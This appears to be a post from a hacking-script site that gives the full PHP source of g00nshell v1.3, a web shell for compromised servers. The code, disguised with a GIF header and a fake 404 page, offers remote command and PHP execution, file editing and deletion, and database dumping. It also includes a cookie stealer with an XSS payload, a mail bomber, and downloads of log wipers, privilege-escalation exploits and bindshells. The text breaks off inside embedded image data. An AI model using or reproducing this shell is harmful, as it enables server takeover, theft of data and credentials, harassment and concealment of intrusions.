HackingScripts

Hack Scripts for everybody

g00nshell v1.3

25 Jan 2014

The g00nshell is similar to the c99 shell, providing the attacker with pretty much complete access to the server.

g00nshell v1.3 Source Code

  1 GIF89;a
  2 666
  3 <?php
  4 /*
  5 
  6 ###
  7 ###
  8 ###
  9 ###
 10 ###
 11 ###
 12 ###
 13 ###
 14 ###
 15 ###
 16 ###
 17 ###
 18 ###
 19 ###
 20 ###
 21 ###
 22 ###
 23 ###
 24 ###
 25 ###
 26 ###
 27 ###
 28 ###
 29 ###
 30 ###
 31 ###
 32 ###
 33 ###
 34 ###
 35 ###
 36 ###
 37 ###
 38 ###
 39 ###
 40 ###
 41 #                       [g00n]FiSh presents:                         #
 42 #                       g00nshell v1.3 final                         #
 43 
 44 ###
 45 ###
 46 ###
 47 ###
 48 ###
 49 ###
 50 ###
 51 ###
 52 ###
 53 ###
 54 ###
 55 ###
 56 ###
 57 ###DOCUMENTATION
 58 ###
 59 ###
 60 ###
 61 ###
 62 ###
 63 ###
 64 ###
 65 ###
 66 ###
 67 ###
 68 ###
 69 ###
 70 ###
 71 ####
 72 #To execute commands, simply include ?cmd=___ in the url.            #
 73 #Ex: http://site.com/shl.php?cmd=whoami                              #
 74 #                                                                    #
 75 #To steal cookies, use ?cookie=___ in the url.                       #
 76 #Ex: <script>document.location.href=                                 #
 77 #'http://site.com/shl.php?cookie='+document.cookies</script>         #
 78 
 79 ###
 80 ###
 81 ###
 82 ###
 83 ###
 84 ###
 85 ###
 86 ###
 87 ###
 88 ###
 89 ###
 90 ###
 91 ###VERIFICATION LEVELS
 92 ###
 93 ###
 94 ###
 95 ###
 96 ###
 97 ###
 98 ###
 99 ###
100 ###
101 ###
102 ###
103 ####
104 #0: No protection; anyone can access                                 #
105 #1: User-Agent required                                              #
106 #2: Require IP                                                       #
107 #3: Basic Authentication                                             #
108 
109 ###
110 ###
111 ###
112 ###
113 ###
114 ###
115 ###
116 ###
117 ###
118 ###
119 ###
120 ###
121 ###
122 ###
123 ###KNOWN BUGS
124 ###
125 ###
126 ###
127 ###
128 ###
129 ###
130 ###
131 ###
132 ###
133 ###
134 ###
135 ###
136 ###
137 ###
138 ###
139 #Windows directory handling                                          #
140 #                                                                    #
141 #The SQL tool is NOT complete. There is currently no editing function#
142 #available. Some time in the future this may be fixed, but for now   #
143 #don't complain to me about it                                       #
144 
145 ###
146 ###
147 ###
148 ###
149 ###
150 ###
151 ###
152 ###
153 ###
154 ###
155 ###
156 ###
157 ###
158 ###
159 ###
160 ###SHOUTS
161 ###
162 ###
163 ###
164 ###
165 ###
166 ###
167 ###
168 ###
169 ###
170 ###
171 ###
172 ###
173 ###
174 ###
175 ###
176 ###
177 #pr0be - Beta testing  & CSS                                         #
178 #TrinTiTTY - Beta testing                                            #
179 #clorox - Beta testing                                               #
180 #Everyone else at g00ns.net                                          #
181 
182 ###
183 ###
184 ###
185 ###
186 ###
187 ###
188 ###
189 ###
190 ###
191 ###
192 ###
193 ###NOTE TO ADMINISTRATORS
194 ###
195 ###
196 ###
197 ###
198 ###
199 ###
200 ###
201 ###
202 ###
203 ###
204 ###
205 ###
206 #If this script has been found on your server without your approval, #
207 #it would probably be wise to delete it and check your logs.         #
208 
209 ###
210 ###
211 ###
212 ###
213 ###
214 ###
215 ###
216 ###
217 ###
218 ###
219 ###
220 ###
221 ###
222 ###
223 ###
224 ###
225 ###
226 ###
227 ###
228 ###
229 ###
230 ###
231 ###
232 ###
233 ###
234 ###
235 ###
236 ###
237 ###
238 ###
239 ###
240 ###
241 ###
242 ###
243 ###
244 */
245 // Configuration
246 $auth = 0;
247 $uakey = "b5c3d0b28619de70bf5588505f4061f2"; // MD5 encoded user-agent
248 $IP = array("127.0.0.2","127.0.0.1"); // IP Addresses allowed to access shell
249 $email = ""; // E-mail address where cookies will be sent
250 $user  = "af1035a85447f5aa9d21570d884b723a"; // MD5 encoded User
251 $pass = "47e331d2b8d07465515c50cb0fad1e5a"; // MD5 encoded Password
252 // Global Variables
253 $version = "1.3 final";
254 $self = $_SERVER['PHP_SELF'];
255 $soft = $_SERVER["SERVER_SOFTWARE"];
256 $servinf = split("[:]", getenv('HTTP_HOST'));
257 $servip = $servinf[0];
258 $servport = $servinf[1];
259 $uname = php_uname();
260 $curuser = @exec('whoami');
261 $cmd = $_GET['cmd'];
262 $act = $_GET['act'];
263 $cmd = $_GET['cmd'];
264 $cookie = $_GET['cookie'];
265 $f = $_GET['f'];
266 $curdir = cleandir(getcwd());
267 if(!$dir){$dir = $_GET['dir'];}
268 elseif($dir && $_SESSION['dir']){$dir = $_SESSION['dir'];}
269 elseif($dir && $_SESSION['dir']){$dir = $curdir;}
270 if($dir && $dir != "nullz"){$dir = cleandir($dir);}
271 $contents = $_POST['contents'];
272 $gf = $_POST['gf'];
273 $img = $_GET['img'];
274 session_start();
275 @set_time_limit(5);
276 switch($auth){ // Authentication switcher
277   case 0: break;
278   case 1: if(md5($_SERVER['HTTP_USER_AGENT']) != $uakey){hide();} break;
279   case 2: if(!in_array($_SERVER['REMOTE_ADDR'],$IP)){hide();} break;
280   case 3: if(!$_SERVER["PHP_AUTH_USER"]){userauth();} break;
281 }
282     
283 function userauth(){ // Basic authentication function
284   global $user, $pass;
285   header("WWW-Authenticate: Basic realm='Secure Area'");
286   if(md5($_SERVER["PHP_AUTH_USER"]) != $user || md5($_SERVER["PHP_AUTH_PW"] != $pass)){
287     hide();
288     die();
289   }
290 }
291 if(!$act && !$cmd && !$cookie && !$f && !$dir && !$gf && !$img){main();}
292 elseif(!$act && $cmd){
293   style();
294   echo("<b>Results:</b>\n<br><textarea rows=20 cols=100>");
295   $cmd = exec($cmd, $result);
296   foreach($result as $line){echo($line . "\n");}
297   echo("</textarea>");
298 }
299 elseif($cookie){@mail("$email", "Cookie Data", "$cookie", "From: $email"); hide();} // Cookie stealer function
300 elseif($act == "view" && $f && $dir){view($f, $dir);}
301 elseif($img){img($img);}
302 elseif($gf){grab($gf);}
303 elseif($dir){files($dir);}
304 else{
305   switch($act){
306     case "phpinfo": phpinfo();break;
307     case "sql": sql();break;
308     case "files": files($dir);break;
309     case "email": email();break;
310     case "cmd": cmd();break;
311     case "upload": upload();break;
312     case "tools": tools();break;
313     case "sqllogin": sqllogin();break;
314     case "sql": sql();break;
315     case "lookup": lookup();break;
316     case "kill": kill();break;
317     case "phpexec": execphp();break;
318     default: main();break;
319   }
320 }
321 function cleandir($d){ // Function to clean up the $dir and $curdir variables
322   $d = realpath($d);
323   $d = str_replace("\\\\", "//", $d);
324   $d = str_replace("////", "//", $d);
325   $d = str_replace("\\", "/", $d);
326   return($d);
327 }
328 function hide(){ // Hiding function
329   global $self, $soft, $servip, $servport;
330 die("<!DOCTYPE HTML PUBLIC '-//IETF//DTD HTML 2.0//EN'>
331 <HTML><HEAD>
332 <TITLE>404 Not Found</TITLE>
333 </HEAD><BODY>
334 <H1>Not Found</H1>
335 The requested URL $self was not found on this server.<P>
336 <P>Additionally, a 404 Not Found
337 error was encountered while trying to use an ErrorDocument to handle the request.
338 <HR>
339 <ADDRESS>$soft Server at $servip Port $servport</ADDRESS>
340 </BODY></HTML>");
341 }
342 function style(){ // Style / header function
343   global $servip,$version;
344   echo("<html>\n
345   <head>\n
346   <title>g00nshell v" . $version . " - " . $servip . "</title>\n
347   <style>\n
348   body { background-color:#000000; color:white; font-family:Verdana; font-size:11px; }\n
349   h1 { color:white; font-family:Verdana; font-size:11px; }\n
350   h3 { color:white; font-family:Verdana; font-size:11px; }\n
351   input,textarea,select { color:#FFFFFF; background-color:#2F2F2F; border:1px solid #4F4F4F; font-family:Verdana; font-size:11px; }\n
352   textarea { font-family:Courier; font-size:11px; }\n
353   a { color:#6F6F6F; text-decoration:none; font-family:Verdana; font-size:11px; }\n
354   a:hover { color:#7F7F7F; }\n
355   td,th { font-size:12px; vertical-align:middle; }\n
356   th { font-size:13px; }\n
357   table { empty-cells:show;}\n
358   .inf { color:#7F7F7F; }\n
359   </style>\n
360   </head>\n");
361 }
362 function main(){ // Main/menu function
363   global $self, $servip, $servport, $uname, $soft, $banner, $curuser, $version;
364   style();
365   $act = array('cmd'=>'Command Execute','files'=>'File View','phpinfo'=>'PHP info', 'phpexec'=>'PHP Execute',
366   'tools'=>'Tools','sqllogin'=>'SQL','email'=>'Email','upload'=>'Get Files','lookup'=>'List Domains','bshell'=>'Bindshell','kill'=>'Kill Shell');
367   $capt = array_flip($act);
368   echo("<form method='GET' name='shell'>");
369   echo("<b>Host:</b> <span class='inf'>" . $servip . "</span><br>");
370   echo("<b>Server software:</b> <span class='inf'>" . $soft . "</span><br>");
371   echo("<b>Uname:</b> <span class='inf'>" . $uname . "</span><br>");
372   echo("<b>Shell Directory:</b> <span class='inf'>" . getcwd() . "</span><br>");
373   echo("<div style='display:none' id='info'>");
374   echo("<b>Current User:</b> <span class='inf'>" . $curuser . "</span><br>");
375   echo("<b>ID:</b> <span class='inf'>" . @exec('id') . "</span><br>");
376   if(@ini_get('safe_mode') != ""){echo("<b>Safemode:</b> <font color='red'>ON</font>");}
377   else{echo("<b>Safemode:</b> <font color='green'>OFF</font>");}
378   echo("\n<br>\n");
379   if(@ini_get('open_basedir') != ""){echo("<b>Open Base Dir:</b> <font color='red'>ON</font> [ <span class='inf'>" . ini_get('open_basedir') . "</span> ]");}
380   else{echo("<b>Open Base Dir:</b> <font color='green'>OFF</font>");}
381   echo("\n<br>\n");
382   if(@ini_get('disable_functions') != ""){echo("<b>Disabled functions:</b> " . @ini_get('disable_functions'));}
383   else{echo("<b>Disabled functions:</b> None");}
384   echo("\n<br>\n");
385   if(@function_exists(mysql_connect)){echo("<b>MySQL:</b> <font color='green'>ON</font>");}
386   else{echo("<b>MySQL:</b> <font color='red'>OFF</font>");}
387   echo("</div>");
388   echo("[ <a href='#hax' onClick=\"document.getElementById('info').style.display = 'block';\">More</a> ] ");
389   echo("[ <a href='#hax' onClick=\"document.getElementById('info').style.display = 'none';\">Less</a> ]");
390   echo("<center>");
391   echo("<h3 align='center'>Links</h3>");
392   if($_SERVER['QUERY_STRING']){foreach($act as $link){echo("[ <a href='?" . $_SERVER['QUERY_STRING'] . "&act=" . $capt[$link] . "' target='frm'>" . $link . "</a> ] ");}}
393   else{foreach($act as $link){echo("[ <a href='?act=" . $capt[$link] . "' target='frm'>" . $link . "</a> ] ");}}
394   echo("</center>");
395   echo("<hr>");
396   echo("<br><iframe name='frm' style='width:100%; height:65%; border:0;' src='?act=files'></iframe>");
397   echo("<pre style='text-align:center'>:: g00nshell <font color='red'>v" . $version . "</font> ::</pre>");
398   die();
399 }
400 function cmd(){ // Command execution function
401   style();
402   echo("<form name='CMD' method='POST'>");
403   echo("<b>Command:</b><br>");
404   echo("<input name='cmd' type='text' size='50'> ");
405   echo("<select name='precmd'>");
406   $precmd = array(''=>'','Read /etc/passwd'=>'cat /etc/passwd','Open ports'=>'netstat -an',
407                   'Running Processes'=>'ps -aux', 'Uname'=>'uname -a', 'Get UID'=>'id',
408                   'Create Junkfile (/tmp/z)'=>'dd if=/dev/zero of=/tmp/z bs=1M count=1024',
409                   'Find passwd files'=>'find / -type f -name passwd');
410   $capt = array_flip($precmd);
411   foreach($precmd as $c){echo("<option value='" . $c . "'>" . $capt[$c] . "\n");}
412   echo("</select><br>\n");
413   echo("<input type='submit' value='Execute'>\n");
414   echo("</form>\n");
415   if($_POST['cmd'] != ""){$x = $_POST['cmd'];}
416   elseif($_POST['precmd'] != ""){$x = $_POST['precmd'];}
417   else{die();}
418   echo("Results: <br><textarea rows=20 cols=100>");
419   $cmd = @exec($x, $result);
420   foreach($result as $line){echo($line . "\n");}
421   echo("</textarea>");
422 }
423 function execphp(){ // PHP code execution function
424   style();
425   echo("<h4>Execute PHP Code</h4>");
426   echo("<form method='POST'>");
427   echo("<textarea name='phpexec' rows=5 cols=100>");
428   if(!$_POST['phpexec']){echo("/*Don't include <? ?> tags*/\n");}
429   echo(htmlentities($_POST['phpexec']) . "</textarea>\n<br>\n");
430   echo("<input type='submit' value='Execute'>");
431   echo("</form>");
432   if($_POST['phpexec']){
433     echo("<textarea rows=10 cols=100>");
434     eval(stripslashes($_POST['phpexec']));
435     echo("</textarea>");
436   }
437 }
438 function sqllogin(){ // MySQL login function
439   session_start();
440   if($_SESSION['isloggedin'] == "true"){
441     header("Location: ?act=sql");
442   }
443   style();
444   echo("<form method='post' action='?act=sql'>");
445   echo("User:<br><input type='text' name='un' size='30'><br>\n");
446   echo("Password:<br><input type='text' name='pw' size='30'><br>\n");
447   echo("Host:<br><input type='text' name='host' size='30' value='localhost'><br>\n");
448   echo("Port:<br><input type='text' name='port' size='30' value='3306'><br>\n");
449   echo("<input type='submit' value='Login'>");
450   echo("</form>");
451   die();
452 }
453 function sql(){ // General SQL Function
454   session_start();
455   if(!$_GET['sqlf']){style();}
456   if($_POST['un'] && $_POST['pw']){;
457     $_SESSION['sql_user'] = $_POST['un'];
458     $_SESSION['sql_password'] = $_POST['pw'];
459   }
460   if($_POST['host']){$_SESSION['sql_host'] = $_POST['host'];}
461   else{$_SESSION['sql_host'] = 'localhost';}
462   if($_POST['port']){$_SESSION['sql_port'] = $_POST['port'];}
463   else{$_SESSION['sql_port'] = '3306';}
464   if($_SESSION['sql_user'] && $_SESSION['sql_password']){
465     if(!($sqlcon = @mysql_connect($_SESSION['sql_host'] . ':' . $_SESSION['sql_port'], $_SESSION['sql_user'], $_SESSION['sql_password']))){
466       unset($_SESSION['sql_user'], $_SESSION['sql_password'], $_SESSION['sql_host'], $_SESSION['sql_port']);
467       echo("Invalid credentials<br>\n");
468       die(sqllogin());
469     }
470     else{
471       $_SESSION['isloggedin'] = "true";
472     }
473   }
474   else{
475     die(sqllogin());
476   }
477   if ($_GET['db']){
478     mysql_select_db($_GET['db'], $sqlcon);
479     if($_GET['sqlquery']){
480       $dat = mysql_query($_GET['sqlquery'], $sqlcon) or die(mysql_error());
481       $num = mysql_num_rows($dat);
482       for($i=0;$i<$num;$i++){
483         echo(mysql_result($dat, $i) . "<br>\n");
484       }
485     }
486     else if($_GET['table'] && !$_GET['sqlf']){
487       echo("<a href='?act=sql&db=" . $_GET['db'] . "&table=" . $_GET['table'] . "&sqlf=ins'>Insert Row</a><br><br>\n");
488       echo("<table border='1'>");
489       $query = "SHOW COLUMNS FROM " . $_GET['table'];
490       $result = mysql_query($query, $sqlcon) or die(mysql_error());
491       $i = 0;
492       $fields = array();
493       while($row = mysql_fetch_assoc($result)){
494         array_push($fields, $row['Field']);
495         echo("<th>" . $fields[$i]);
496         $i++;
497       }
498       $result = mysql_query("SELECT * FROM " . $_GET['table'], $sqlcon) or die(mysql_error());
499       $num_rows = mysql_num_rows($result) or die(mysql_error());
500       $y=0;
501       for($x=1;$x<=$num_rows+1;$x++){
502         if(!$_GET['p']){
503           $_GET['p'] = 1;
504         }
505         if($_GET['p']){
506           if($y > (30*($_GET['p']-1)) && $y <= 30*($_GET['p'])){
507             echo("<tr>");
508             for($i=0;$i<count($fields);$i++){
509               $query = "SELECT " . $fields[$i] . " FROM " . $_GET['table'] . " WHERE " . $fields[0] . " = '" . $x . "'";
510               $dat = mysql_query($query, $sqlcon) or die(mysql_error());
511               while($row = mysql_fetch_row($dat)){
512                 echo("<td>" . $row[0] . "</td>");
513               }
514             }
515             echo("</tr>\n");
516           }
517         }
518         $y++;
519       }
520       echo("</table>\n");
521       for($z=1;$z<=ceil($num_rows / 30);$z++){
522         echo("<a href='?act=sql&db=" . $_GET['db'] . "&table=" . $_GET['table'] . "&p=" . $z . "'>" . $z . "</a> | ");
523       }
524     }
525     elseif($_GET['table'] && $_GET['sqlf']){
526       switch($_GET['sqlf']){
527         case "dl": sqldownload();break;
528         case "ins": sqlinsert();break;
529         default: $_GET['sqlf'] = "";
530       }
531     }
532     else{
533       echo("<table>");
534       $query = "SHOW TABLES FROM " . $_GET['db'];
535       $dat = mysql_query($query, $sqlcon) or die(mysql_error());
536       while ($row = mysql_fetch_row($dat)){
537         echo("<tr><td><a href='?act=sql&db=" . $_GET['db'] . "&table=" . $row[0] ."'>" . $row[0] . "</a></td><td>[<a href='?act=sql&db=" . $_GET['db'] . "&table=" . $row[0] ."&sqlf=dl'>Download</a>]</td></tr>\n");
538       }
539       echo("</table>");
540     }
541   }
542   else{
543     $dbs=mysql_list_dbs($sqlcon);
544     while($row = mysql_fetch_object($dbs)) {
545       echo("<a href='?act=sql&db=" . $row->Database . "'>" . $row->Database . "</a><br>\n");
546     }
547   }
548   mysql_close($sqlcon);
549 }
550 function sqldownload(){ // Download sql file function
551   @ob_flush;
552   $sqlcon = @mysql_connect($_SESSION['sql_host'] . ':' . $_SESSION['sql_port'], $_SESSION['sql_user'], $_SESSION['sql_password']);
553   mysql_select_db($_GET['db'], $sqlcon);
554   $query = "SHOW COLUMNS FROM " . $_GET['table'];
555   $result = mysql_query($query, $sqlcon) or die(mysql_error());
556   $fields = array();
557   while($row = mysql_fetch_assoc($result)){
558     array_push($fields, $row['Field']);
559     $i++;
560   }
561   $result = mysql_query("SELECT * FROM " . $_GET['table'], $sqlcon) or die(mysql_error());
562   $num_rows = mysql_num_rows($result) or die(mysql_error());
563   for($x=1;$x<$num_rows;$x++){
564     $out .= "(";
565     for($i=0;$i<count($fields);$i++){
566       $out .= "'";
567       $query = "SELECT " . $fields[$i] . " FROM " . $_GET['table'] . " WHERE " . $fields[0] . " = '" . $x . "'";
568       $dat = mysql_query($query, $sqlcon) or die(mysql_error());
569       while($row = mysql_fetch_row($dat)){
570         if($row[0] == ""){
571           $row[0] = "NULL";
572         }
573         if($i != count($fields)-1){
574           $out .= str_replace("\r\n", "\\r\\n", $row[0]) . "', ";
575         }
576         else{
577           $out .= $row[0]. "'";
578         }
579       }
580     }
581     $out .= ");\n";
582   }
583   $filename = $_GET['table'] . "-" . time() . '.sql';
584   header("Content-type: application/octet-stream");
585   header("Content-length: " . strlen($out));
586   header("Content-disposition: attachment; filename=" . $filename . ";");
587   echo($out);
588   die();
589 }
590 function sqlinsert(){
591   style();
592   $sqlcon = @mysql_connect($_SESSION['sql_host'] . ':' . $_SESSION['sql_port'], $_SESSION['sql_user'], $_SESSION['sql_password']);
593   mysql_select_db($_GET['db'], $sqlcon);
594   if($_POST['ins']){
595     unset($_POST['ins']);
596     $fields = array_flip($_POST);
597     $f = implode(",", $fields);
598     $v = implode(",", $_POST);
599     $query = "INSERT INTO " . $_GET['table'] . " (" . $f . ") VALUES (" . $v . ")";
600     mysql_query($query, $sqlcon) or die(mysql_error());
601     die("Row inserted.<br>\n<a href='?act=sql&db=" . $_GET['db'] . "&table=" . $_GET['table'] . "'>Go back</a>");
602   }
603   $query = "SHOW COLUMNS FROM " . $_GET['table'];
604   $result = mysql_query($query, $sqlcon) or die(mysql_error());
605   $i = 0;
606   $fields = array();
607   echo("<form method='POST'>");
608   echo("<table>");
609   while($row = mysql_fetch_assoc($result)){
610     array_push($fields, $row['Field']);
611     echo("<tr><td><b>" . $fields[$i] . "</b><td><input type='text' name='" . $fields[$i] . "'><br>\n");
612     $i++;
613   }
614   echo("</table>");
615   echo("<br>\n<input type='submit' value='Insert' name='ins'>");
616   echo("</form>");
617 }
618 function nicesize($size){
619   if(!$size){return false;}
620   if ($size >= 1073741824){return(round($size / 1073741824) . " GB");}
621   elseif ($size >= 1048576){return(round($size / 1048576) . " MB");}
622   elseif ($size >= 1024){return(round($size / 1024) . " KB");}
623   else{return($size . " B");}
624 }
625 function files($dir){ // File manipulator function
626   style();
627   global $self, $curdir;
628   if($dir==""){$dir = $curdir;}
629   $dirx = explode("/", $dir);
630   $files = array();
631   $folders = array();
632   echo("<form method='GET'>");
633   echo("<input type='text' name='dir' value='" . $dir . "' size='40'>");
634   echo("<input type='submit' value='Go'>");
635   echo("</form>");
636   echo("<h4>File list for ");
637   for($i=0;$i<count($dirx);$i++){
638     $totalpath .= $dirx[$i] . "/";
639     echo("<a href='?dir=" . $totalpath . "'>$dirx[$i]</a>" . "/");
640   }
641   echo("</h4>");
642   echo("<table>");
643   echo("<th>File Name<th>File Size</th>");
644   if ($handle = opendir($dir)) {
645     while (false != ($link = readdir($handle))) {
646       if (is_dir($dir . '/' . $link)){
647         $file = array();
648         if(is_writable($dir . '/' . $link)){$file['perm']='write';}
649         elseif(is_readable($dir . '/' . $link)){$file['perm']='read';}
650         else{$file['perm']='none';}
651         switch($file['perm']){
652           case "write": @$file['link'] = "<a href='?dir=$dir/$link'><font color='green'>$link</font></a>"; break;
653           case "read": @$file['link'] = "<a href='?dir=$dir/$link'><font color='yellow'>$link</font></a>"; break;
654           case "none": @$file['link'] = "<a href='?dir=$dir/$link'><font color='red'>$link</font></a>"; break;
655           default: @$file['link'] = "<a href='?dir=$dir/$link'><font color='red'>$link</font></a>"; break;
656         }
657         @$file['icon'] = "folder";
658         if($_SERVER['QUERY_STRING']){$folder = "<img src='?" . $_SERVER['QUERY_STRING'] . "&img=" . $file['icon']. "'> " . $file['link'];}
659         else{$folder = "<img src='?img=" . $file['icon']. "'> " . $file['link'];}
660         array_push($folders, $folder);
661       }
662       else{
663         $file = array();
664         $ext = strtolower(end(explode(".", $link)));
665         if(!$file['size'] = nicesize(@filesize($dir . '/' . $link))){
666           $file['size'] = "0B";
667         }
668         if(is_writable($dir . '/' . $link)){$file['perm']='write';}
669         elseif(is_readable($dir . '/' . $link)){$file['perm']='read';}
670         else{$file['perm']='none';}
671         switch($file['perm']){
672           case "write": @$file['link'] = "<a href='?act=view&f=" . $link . "&dir=$dir'><font color='green'>$link</font></a>"; break;
673           case "read": @$file['link'] = "<a href='?act=view&f=" . $link . "&dir=$dir'><font color='yellow'>$link</font></a>"; break;
674           case "none": @$file['link'] = "<a href='?act=view&f=" . $link . "&dir=$dir'><font color='red'>$link</font></a>"; break;
675           default: @$file['link'] = "<a href='?act=view&f=" . $link . "&dir=$dir'><font color='red'>$link</a></font>"; break;
676         }
677         switch($ext){
678         case "exe": case "com": case "jar": case "": $file['icon']="binary"; break;
679         case "jpg": case "gif": case "png": case "bmp": $file['icon']="image"; break;
680         case "zip": case "tar": case "rar": case "gz": case "cab": case "bz2": case "gzip": $file['icon']="compressed"; break;
681         case "txt": case "doc": case "pdf": case "htm": case "html": case "rtf": $file['icon']="text"; break;
682         case "wav": case "mp3": case "mp4": case "wma": $file['icon']="sound"; break;
683         case "js": case "vbs": case "c": case "h": case "sh": case "pl": case "py": case "php": case "h": $file['icon']="script"; break;
684         default: $file['icon'] = "unknown"; break;
685         }
686         if($_SERVER['QUERY_STRING']){$file = "<tr><td><img src='?" . $_SERVER['QUERY_STRING'] . "&img=" . $file['icon']. "' height='18' width='18'> " . $file['link'] . "</td><td>" . $file['size'] . "</td></tr>\n";}
687         else{$file = "<tr><td><img src='?img=" . $file['icon']. "' height='18' width='18'> " . $file['link'] . "<td>" . $file['size'] . "</td></tr>\n";}
688         array_push($files, $file);
689       }
690     }
691   foreach($folders as $folder){echo("<tr><td>$folder</td><td>DIR</td></tr>\n");}
692   foreach($files as $file){echo($file);}
693   echo("</table>");
694   closedir($handle);
695   }
696 }
697 function email(){ // Email bomber function
698   $times = $_POST['times'];
699   $to = $_POST['to'];
700   $subject = $_POST['subject'];
701   $body = $_POST['body'];
702   $from = $_POST['from'];
703   style();
704   echo("<h2>Mail Bomber</h2>
705   <form method='POST' action='?act=email'>
706   <b>Your address:</b><br>
707   <input name='from' type='text' size='35'><br>
708   <b>Their address:</b><br>
709   <input name='to' type='text' size='35'><br>
710   <b>Subject:</b><br>
711   <input name='subject' type='text' size='35'><br>
712   <b>Text:</b><br>
713   <input name='body' type='text' size='35'><br>
714   <b>How many times:</b><br>
715   <input name='times' type='text' size='5'><br><br>
716   <input name='submit' type='submit' value='Submit'>
717   </form>");
718   if ($to && $from){for($i=0;$i<$times;$i++){mail("$to", "$subject", "$body", "From: $from");}}
719 }
720 function view($filename, $dir){ // File view function
721   if($_POST['fileact'] == "Download"){
722     header("Content-type: application/octet-stream");
723     header("Content-length: ".strlen($_POST['contents']));
724     header("Content-disposition: attachment; filename=" . basename($filename) . ";");
725     $handle = fopen($filename, "r");
726     echo(fread($handle, filesize($filename)));
727     die();
728   }
729   style();
730   if($_POST['contents'] && $_POST['fileact'] == "Save"){
731     $handle = fopen($filename, 'w');
732     fwrite($handle, stripslashes($_POST['contents']));
733     fclose($handle);
734     echo("Saved file.<br><br>");
735     echo("<a href='?act=view&f=$filename&dir=nullz'>Go back</a>");
736     die();
737   }
738   elseif($_POST['fileact'] == "Delete"){
739     unlink($filename);
740     echo("Deleted file.<br><br>");
741     echo("<a href='?act=files'>Go back</a>");
742     die();
743   }
744   if($dir != "nullz"){ // heh
745     $filename = $dir."/".$filename;
746   }
747   $bad = array("<", ">");
748   $good = array("<", ">");
749   $file = fopen($filename, 'r');
750   $content = fread($file, @filesize($filename));
751   echo("<form name='file' method='POST' action='?act=view&dir=$dir&f=$filename'>");
752   echo("<textarea style='width:100%; height:92%;' name='contents'>");
753   echo(str_replace($bad, $good, $content)."\n");
754   echo("</textarea>");
755   echo("<input name='fileact' type='submit' value='Save'>");
756   echo("<input name='fileact' type='submit' value='Delete'>");
757   echo("<input name='fileact' type='submit' value='Download'>");
758   echo("</form>");
759 }
760 function edit($file, $contents){ // File edit function
761   style();
762   $handle = fopen($file, 'w');
763   fwrite($handle, $contents);
764   fclose($handle);
765   echo("Saved file.<br><br>");
766   echo("<a href='?act=files'>Go back</a>");
767 }
768 function upload(){ // Uploading frontend function
769   global $curdir;
770   style();
771   echo("<form name='files' enctype='multipart/form-data' method='POST'>
772   <b>Output Directory</b><br>
773   <input type='text' name='loc' size='65' value='" . $curdir . "'><br><br>
774   <b>Remote Upload</b><br>
775   <input type='text' name='rem' size='65'>
776   <input type='submit' value='Grab'><br><br>
777   <b>Local File Upload</b><br>
778   <input name='up' type='file' size='65'>
779   <input type='submit' value='Upload'>
780   </form><br>");
781   if($_POST['rem']){grab($_POST['rem']);}
782   if($_FILES['up']){up($_FILES['up']);}
783 }
784 function up($up){ // Uploading backend function
785   style();
786   $updir = $_POST['loc'];
787   move_uploaded_file($up["tmp_name"], $updir . "/" . $up["name"]);
788   die("File has been uploaded.");
789 }
790 function grab($file){ // Uploading backend function
791   style();
792   $updir = $_POST['loc'];
793   $filex = array_pop(explode("/", $file));
794   if(exec("wget $file -b -O $updir/$filex")){die("File has been uploaded.");}
795   else{die("File upload failed.");}
796 }
797 function tools(){ // Useful tools function
798   global $curdir;
799   style();
800   $tools = array(
801   "--- Log wipers ---"=>"1",
802   "Vanish2.tgz"=>"http://packetstormsecurity.org/UNIX/penetration/log-wipers/vanish2.tgz",
803   "Cloak.c"=>"http://packetstormsecurity.org/UNIX/penetration/log-wipers/cloak.c",
804   "gh0st.sh"=>"http://packetstormsecurity.org/UNIX/penetration/log-wipers/gh0st.sh",
805   "--- Priv Escalation ---"=>"2",
806   "h00lyshit - Linux 2.6 ALL"=>"http://someshit.net/files/xpl/h00lyshit",
807   "k-rad3 - Linux <= 2.6.11"=>"http://someshit.net/files/xpl/krad3",
808   "raptor - Linux <= 2.6.17.4"=>"http://someshit.net/files/xpl/raptor",
809   "rootbsd - BSD v?"=>"http://someshit.net/files/xpl/rootbsd",
810   "--- Bindshells ---"=>"3",
811   "THC rwwwshell-1.6.perl"=>"http://packetstormsecurity.org/groups/thc/rwwwshell-1.6.perl",
812   "Basic Perl bindshell"=>"http://packetstormsecurity.org/groups/synnergy/bindshell-unix",
813   "--- Misc ---"=>"4",
814   "MOCKS SOCKS4 Proxy"=>"http://superb-east.dl.sourceforge.net/sourceforge/mocks/mocks-0.0.2.tar.gz",
815   "xps.c (proc hider)"=>"http://packetstormsecurity.org/groups/shadowpenguin/unix-tools/xps.c");
816   $names = array_flip($tools);
817   echo("<b>Tools:</b>");
818   echo("<form method='post'>");
819   echo("<b>Output Directory</b><br>");
820   echo("<input type='text' name='loc' size='65' value='" . $curdir . "'><br><br>");
821   echo("<select name='gf' style='align:center;'>");
822   foreach($tools as $tool) {echo("<option value='" . $tool . "'>" . $names[$tool] . "</option>\n");}
823   echo("</select>");
824   echo("<br><input type='submit' value='Grab'>");
825   echo("</form>");
826 }
827 function lookup(){ // Domain lookup function
828   style();
829   global $servinf;
830   $script = "import urllib, urllib2, sys, re
831   req = urllib2.Request('http://www.seologs.com/ip-domains.html', urllib.urlencode({'domainname' : sys.argv[1]}))
832   site = re.findall('.+\) (.+)<br>', urllib2.urlopen(req).read())
833   for i in xrange(0,len(site)):
834     print site[i]"; // My sexy python script
835   $handle = fopen('lookup.py', 'w');
836   fwrite($handle, $script);
837   fclose($handle);
838   echo("<h4>Domains</h4>");
839   echo("<ul>");
840   $cmd = exec("python lookup.py " . $servinf[0], $ret);
841   foreach($ret as $site){echo("<li>" . $site . "\n");}
842   unlink('lookup.py');
843 }
844 function img($img){ // Images function
845   $images = array(
846   "folder"=>"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAAA" .
847   "gALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp/4YchffzGQhH4YRYPB2DOlHPiKwq" .
848   "d1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=",
849   "image"=>"R0lGODlhFAAWAOMAAP////8zM8z//8zMzJmZmWZmZmYAADMzMwCZzACZMwAzZgAAAAAAAAAAAAAAAAAAACH+TlRoaX" .
850   "MgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1i" .
